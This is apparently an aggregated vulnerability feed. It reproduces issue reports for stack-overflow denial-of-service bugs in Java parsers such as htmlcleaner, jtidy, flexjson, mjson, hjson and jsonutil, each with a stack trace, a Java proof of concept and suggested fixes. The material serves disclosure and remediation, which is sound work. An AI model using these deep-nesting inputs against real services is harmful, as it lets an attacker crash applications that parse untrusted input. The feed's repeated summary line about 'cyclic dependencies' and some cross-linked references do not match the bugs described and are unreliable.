.NET, .NET Framework, and Visual Studio Denial of Service Vulnerability

CVE-2023-29331

.NET and Visual Studio Denial of Service Vulnerability

CVE-2023-32030

Red Hat OpenShift Container Platform release 4.11.43 is now available with updates to packages and images that fix several bugs and add enhancements.
This release includes a security update for Red Hat OpenShift Container Platform 4.11.
Red Hat Product Security has rated this update as having a security impact of [impact]. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:
* CVE-2021-38561: A flaw was found in golang. The language package for go language can panic due to an out-of-bounds read when an incorrectly formatted language tag is being parsed. This flaw allows an attacker to cause applications using this package to parse untrusted input data to crash, leading to a denial of service of the affected component.


RHSA-2023:3542: Red Hat Security Advisory: OpenShift Container Platform 4.11.43 bug fix and security update

An issue was discovered jackson-databind thru 2.15.2 allows attackers to cause a denial of service or other unspecified impacts via crafted object that uses cyclic dependencies.

This happens with any recursive data structure. Jackson will not detect loops in data structures. For example:

    public static void main(String\[\] args) throws JsonProcessingException {
        A a = new A();
        A b = new A();
        a.next = b;
        b.next = a;
        new ObjectMapper().writeValueAsString(a); // will fail
    }

    static class A {
        A next;

        public A getNext() {
            return next;
        }
    }

imo this is not really an issue. For example, calling hashCode on the same map would also cause a stack overflow, but this is not considered a security issue. You can't construct such a data structure using jackson deserialization. Others may disagree on this though.

BeanSerializer has some error handling to make the error a bit nicer, but it's still a stack overflow with all the issues associated with that.

> This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted string.

Your test case does not demonstrate this, can you please show how this can be exploited via a crafted string?

CVE-2023-35116: Stack overflow error caused by serialization of Map or List with self references · Issue #3972 · FasterXML/jackson-databind

An issue was discovered htmlcleaner thru = 2.28 allows attackers to cause a denial of service or other unspecified impacts via crafted object that uses cyclic dependencies.

**Stack overflow error caused by htmlcleaner parsing of untrusted HTML String****Description**

Using htmlcleaner to parse untrusted HTML String may be vulnerable to denial of service (DOS) attacks. If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow.

**Error Log**

    Exception in thread "main" java.lang.StackOverflowError
    	at java.base/java.util.HashMap$KeyIterator.<init>(HashMap.java:1531)
    	at java.base/java.util.HashMap$KeySet.iterator(HashMap.java:913)
    	at java.base/java.util.HashSet.iterator(HashSet.java:173)
    	at org.htmlcleaner.HtmlCleaner.addIfNeededToPruneSet(HtmlCleaner.java:1339)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:332)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    
    
    

**PoC**

        <dependency\>
            <groupId\>net.sourceforge.htmlcleaner</groupId\>
            <artifactId\>htmlcleaner</artifactId\>
            <version\>2.28</version\>
        </dependency\>

import org.htmlcleaner.HtmlCleaner;
import org.htmlcleaner.TagNode;

public class PoC {
    public final static int TOO\_DEEP\_NESTING = 9999;
    public final static String TOO\_DEEP\_DOC = \_nestedDoc(TOO\_DEEP\_NESTING, "<div>", "</div>", "");


    public static String \_nestedDoc(int nesting, String open, String close, String content) {
        StringBuilder sb = new StringBuilder(nesting \* (open.length() + close.length()));
        for (int i = 0; i < nesting; ++i) {
            sb.append(open);
            if ((i & 31) == 0) {
                sb.append("\\n");
            }
        }
        sb.append("\\n").append(content).append("\\n");
        for (int i = 0; i < nesting; ++i) {
            sb.append(close);
            if ((i & 31) == 0) {
                sb.append("\\n");
            }
        }
        return sb.toString();
    }

    public static void main(String\[\] args) {
        String htmlData = TOO\_DEEP\_DOC;
        try {

            // 模糊测试组件的风险接口
            HtmlCleaner cleaner = new HtmlCleaner();
            TagNode root = cleaner.clean(htmlData);

            // 对解析结果进行进一步操作
            // ...

        } catch (Exception e) {
            // 处理异常
        }
    }
}

**Rectification Solution**

1.  Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (FasterXML/jackson-databind@fcfc499)
    
2.  Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing.(（google/gson@2d01d6a20f39881c692977564c1ea591d9f39027）)

CVE-2023-34624: Stack overflow error caused by htmlcleaner parsing of untrusted HTML String · Issue #13 · amplafi/htmlcleaner

An issue was discovered jtidy thru r938 allows attackers to cause a denial of service or other unspecified impacts via crafted object that uses cyclic dependencies.

**Stack overflow error caused by jtidy parsing of untrusted Html String****Description**

Using jtidy to parse untrusted Html String may be vulnerable to denial of service (DOS) attacks. If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow.

**Error Log**

    Exception in thread "main" java.lang.StackOverflowError
    	at java.base/java.nio.charset.Charset.lookup(Charset.java:457)
    	at java.base/java.nio.charset.Charset.isSupported(Charset.java:503)
    	at java.base/java.lang.StringCoding.lookupCharset(StringCoding.java:101)
    	at java.base/java.lang.StringCoding.decode(StringCoding.java:234)
    	at java.base/java.lang.String.<init>(String.java:467)
    	at org.w3c.tidy.TidyUtils.getString(TidyUtils.java:658)
    	at org.w3c.tidy.Lexer.getToken(Lexer.java:2343)
    	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2051)
    	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
    	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
    	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
    	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
    	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
    	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
    	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
    	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
    	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
    	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
    	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
    	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
    	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
    	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
    	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
    	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
    	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
    	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
    	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
    	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
    	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
    	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
    	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
    	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
    	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
    	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
    	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
    	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
    	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
    
    

**PoC**

        <dependency\>
            <groupId\>net.sf.jtidy</groupId\>
            <artifactId\>jtidy</artifactId\>
            <version\>r938</version\>
        </dependency\>

import org.w3c.tidy.Tidy;

import java.io.StringReader;

public class PoC {
    public final static int TOO\_DEEP\_NESTING = 9999;
    public final static String TOO\_DEEP\_DOC = \_nestedDoc(TOO\_DEEP\_NESTING, "<div>", "</div>", "");


    public static String \_nestedDoc(int nesting, String open, String close, String content) {
        StringBuilder sb = new StringBuilder(nesting \* (open.length() + close.length()));
        for (int i = 0; i < nesting; ++i) {
            sb.append(open);
            if ((i & 31) == 0) {
                sb.append("\\n");
            }
        }
        sb.append("\\n").append(content).append("\\n");
        for (int i = 0; i < nesting; ++i) {
            sb.append(close);
            if ((i & 31) == 0) {
                sb.append("\\n");
            }
        }
        return sb.toString();
    }

    public static void main(String\[\] args) {
        String htmlData = TOO\_DEEP\_DOC;
        try (StringReader stringReader = new StringReader(htmlData);){
            Tidy tidy = new Tidy();
            tidy.parse(stringReader, System.out);
        } catch (Exception e) {
        }
    }
}

**Rectification Solution**

1.  Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (FasterXML/jackson-databind@fcfc499)
    
2.  Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing.(（google/gson@2d01d6a20f39881c692977564c1ea591d9f39027）)

CVE-2023-34623: Stack overflow error caused by jtidy parsing of untrusted Html String · Issue #4 · trajano/jtidy

An issue was discovered flexjson thru 3.3 allows attackers to cause a denial of service or other unspecified impacts via crafted object that uses cyclic dependencies.

**Stack overflow error caused by flexjson serialization List****Description**

flexjson before v3.3 was discovered to contain a stack overflow via the List parameter. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted string.

**Error Log**

Exception in thread "main" java.lang.StackOverflowError
    at java.base/java.util.Stack.push(Stack.java:67)
    at flexjson.JSONContext.pushTypeContext(JSONContext.java:140)
    at flexjson.JSONContext.writeOpenArray(JSONContext.java:268)
    at flexjson.transformer.IterableTransformer.transform(IterableTransformer.java:24)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.JSONContext.transform(JSONContext.java:72)
    at flexjson.transformer.IterableTransformer.transform(IterableTransformer.java:28)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.JSONContext.transform(JSONContext.java:72)
    at flexjson.transformer.IterableTransformer.transform(IterableTransformer.java:28)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.JSONContext.transform(JSONContext.java:72)
    at flexjson.transformer.IterableTransformer.transform(IterableTransformer.java:28)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.JSONContext.transform(JSONContext.java:72)
    at flexjson.transformer.IterableTransformer.transform(IterableTransformer.java:28)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.JSONContext.transform(JSONContext.java:72)
    at flexjson.transformer.IterableTransformer.transform(IterableTransformer.java:28)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.JSONContext.transform(JSONContext.java:72)

**PoC**

<dependency>
<groupId>net.sf.flexjson</groupId>
<artifactId>flexjson</artifactId>
<version>3.3</version>
</dependency>

importflexjson.JSONSerializer;

importjava.util.ArrayList;

publicclass PoC3{
publicstaticvoidmain(String[]args){

ArrayList<Object>list=newArrayList<>();
list.add(list);

Strings=newJSONSerializer().deepSerialize(list);
}
}

**Rectification Solution**

1.  Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (https://github.com/FasterXML/jackson-databind/commit/fcfc4998ec23f0b1f7f8a9521c2b317b6c25892b)
    
2.  Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing.(（https://github.com/google/gson/commit/2d01d6a20f39881c692977564c1ea591d9f39027）)
    

**References**

1.  https://github.com/jettison-json/jettison/issues/52
2.  https://github.com/jettison-json/jettison/pull/53/files

CVE-2023-34609: Flexjson / Bugs / #51 Stack overflow error caused by flexjson serialization List

An issue was discovered mjson thru 1.4.1 allows attackers to cause a denial of service or other unspecified impacts via crafted object that uses cyclic dependencies.

**Stack overflow error caused by mjson parsing of untrusted JSON String****Description**

Using mjson to parse untrusted JSON String may be vulnerable to denial of service (DOS) attacks. If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow.

**Error Log**

    Exception in thread "main" java.lang.StackOverflowError
    	at java.base/java.lang.ThreadLocal.get(ThreadLocal.java:165)
    	at mjson.Json.factory(Json.java:1192)
    	at mjson.Json.array(Json.java:1291)
    	at mjson.Json$Reader.readArray(Json.java:2787)
    	at mjson.Json$Reader.read(Json.java:2715)
    	at mjson.Json$Reader.readArray(Json.java:2788)
    	at mjson.Json$Reader.read(Json.java:2715)
    	at mjson.Json$Reader.readArray(Json.java:2788)
    	at mjson.Json$Reader.read(Json.java:2715)
    	at mjson.Json$Reader.readArray(Json.java:2788)
    	at mjson.Json$Reader.read(Json.java:2715)
    	at mjson.Json$Reader.readArray(Json.java:2788)
    	at mjson.Json$Reader.read(Json.java:2715)
    	at mjson.Json$Reader.readArray(Json.java:2788)
    	at mjson.Json$Reader.read(Json.java:2715)
    	at mjson.Json$Reader.readArray(Json.java:2788)
    	at mjson.Json$Reader.read(Json.java:2715)
    	at mjson.Json$Reader.readArray(Json.java:2788)
    	at mjson.Json$Reader.read(Json.java:2715)
    	at mjson.Json$Reader.readArray(Json.java:2788)
    	at mjson.Json$Reader.read(Json.java:2715)
    	at mjson.Json$Reader.readArray(Json.java:2788)
    	at mjson.Json$Reader.read(Json.java:2715)
    	at mjson.Json$Reader.readArray(Json.java:2788)
    
    

**PoC**

        <dependency\>
            <groupId\>org.sharegov</groupId\>
            <artifactId\>mjson</artifactId\>
            <version\>1.4.1</version\>
        </dependency\>

import mjson.Json;

public class PoC {

    public final static int TOO\_DEEP\_NESTING = 9999;
    public final static String TOO\_DEEP\_DOC = \_nestedDoc(TOO\_DEEP\_NESTING, "\[ ", "\] ", "0");


    public static String \_nestedDoc(int nesting, String open, String close, String content) {
        StringBuilder sb = new StringBuilder(nesting \* (open.length() + close.length()));
        for (int i = 0; i < nesting; ++i) {
            sb.append(open);
            if ((i & 31) == 0) {
                sb.append("\\n");
            }
        }
        sb.append("\\n").append(content).append("\\n");
        for (int i = 0; i < nesting; ++i) {
            sb.append(close);
            if ((i & 31) == 0) {
                sb.append("\\n");
            }
        }
        return sb.toString();
    }

    public static void main(String\[\] args) {
        String jsonString = TOO\_DEEP\_DOC;
        Json.read(jsonString);
    }
}

**Rectification Solution**

1.  Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (FasterXML/jackson-databind@fcfc499)
    
2.  Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing.(（google/gson@2d01d6a20f39881c692977564c1ea591d9f39027）)

CVE-2023-34611: Stack overflow error caused by mjson parsing of untrusted JSON String · Issue #40 · bolerio/mjson

An issue was discovered hjson thru 3.0.0 allows attackers to cause a denial of service or other unspecified impacts via crafted object that uses cyclic dependencies.

**Stack overflow error caused by hjson parsing of untrusted JSON String****Description**

Using hjson to parse untrusted JSON String may be vulnerable to denial of service (DOS) attacks. If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow.

**Error Log**

    Exception in thread "main" java.lang.StackOverflowError
    	at org.hjson.HjsonParser.read(HjsonParser.java:454)
    	at org.hjson.HjsonParser.skipWhiteSpace(HjsonParser.java:411)
    	at org.hjson.HjsonParser.readObject(HjsonParser.java:185)
    	at org.hjson.HjsonParser.readValue(HjsonParser.java:119)
    	at org.hjson.HjsonParser.readObject(HjsonParser.java:199)
    	at org.hjson.HjsonParser.readValue(HjsonParser.java:119)
    	at org.hjson.HjsonParser.readObject(HjsonParser.java:199)
    	at org.hjson.HjsonParser.readValue(HjsonParser.java:119)
    	at org.hjson.HjsonParser.readObject(HjsonParser.java:199)
    	at org.hjson.HjsonParser.readValue(HjsonParser.java:119)
    	at org.hjson.HjsonParser.readObject(HjsonParser.java:199)
    	at org.hjson.HjsonParser.readValue(HjsonParser.java:119)
    	at org.hjson.HjsonParser.readObject(HjsonParser.java:199)
    	at org.hjson.HjsonParser.readValue(HjsonParser.java:119)
    	at org.hjson.HjsonParser.readObject(HjsonParser.java:199)
    	at org.hjson.HjsonParser.readValue(HjsonParser.java:119)
    	at org.hjson.HjsonParser.readObject(HjsonParser.java:199)
    
    

**PoC**

        <dependency\>
            <groupId\>org.hjson</groupId\>
            <artifactId\>hjson</artifactId\>
            <version\>3.0.0</version\>
        </dependency\>

import org.hjson.JsonValue;

public class PoC {

    public final static int TOO\_DEEP\_NESTING = 9999;
    public final static String TOO\_DEEP\_DOC = "{" + \_nestedDoc(TOO\_DEEP\_NESTING, "a : { ", "} ", "") + "}";


    public static String \_nestedDoc(int nesting, String open, String close, String content) {
        StringBuilder sb = new StringBuilder(nesting \* (open.length() + close.length()));
        for (int i = 0; i < nesting; ++i) {
            sb.append(open);
            if ((i & 31) == 0) {
                sb.append("\\n");
            }
        }
        sb.append("\\n").append(content).append("\\n");
        for (int i = 0; i < nesting; ++i) {
            sb.append(close);
            if ((i & 31) == 0) {
                sb.append("\\n");
            }
        }
        return sb.toString();
    }

    public static void main(String\[\] args) {
        String jsonString = TOO\_DEEP\_DOC;
        JsonValue.readHjson(jsonString);
    }
}

**Rectification Solution**

1.  Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (FasterXML/jackson-databind@fcfc499)
    
2.  Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing.(（google/gson@2d01d6a20f39881c692977564c1ea591d9f39027）)

CVE-2023-34620: Stack overflow error caused by hjson parsing of untrusted JSON String  (2) · Issue #24 · hjson/hjson-java

An issue was discovered JSONUtil thru 5.0 allows attackers to cause a denial of service or other unspecified impacts via crafted object that uses cyclic dependencies.

**Stack overflow error caused by jsonutil parsing of untrusted JSON String****Description**

Using jsonutil to parse untrusted JSON String may be vulnerable to denial of service (DOS) attacks. If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow.

**Error Log**

    Exception in thread "main" java.lang.StackOverflowError
    	at net.pwall.util.ParseText.skipSpaces(ParseText.java:1072)
    	at net.pwall.json.JSON.parse(JSON.java:535)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    
    

**PoC**

        <dependency\>
            <groupId\>net.pwall.json</groupId\>
            <artifactId\>jsonutil</artifactId\>
            <version\>5.0</version\>
        </dependency\>

import net.pwall.json.JSON;

public class PoC {

    public final static int TOO\_DEEP\_NESTING = 9999;
    public final static String TOO\_DEEP\_DOC = \_nestedDoc(TOO\_DEEP\_NESTING, "\[ ", "\] ", "0");


    public static String \_nestedDoc(int nesting, String open, String close, String content) {
        StringBuilder sb = new StringBuilder(nesting \* (open.length() + close.length()));
        for (int i = 0; i < nesting; ++i) {
            sb.append(open);
            if ((i & 31) == 0) {
                sb.append("\\n");
            }
        }
        sb.append("\\n").append(content).append("\\n");
        for (int i = 0; i < nesting; ++i) {
            sb.append(close);
            if ((i & 31) == 0) {
                sb.append("\\n");
            }
        }
        return sb.toString();
    }

    public static void main(String\[\] args) {
        String jsonString = TOO\_DEEP\_DOC;
        JSON.parse(jsonString);
    }
}

**Rectification Solution**

1.  Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (FasterXML/jackson-databind@fcfc499)
    
2.  Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing.(（google/gson@2d01d6a20f39881c692977564c1ea591d9f39027）)

Tag

#dos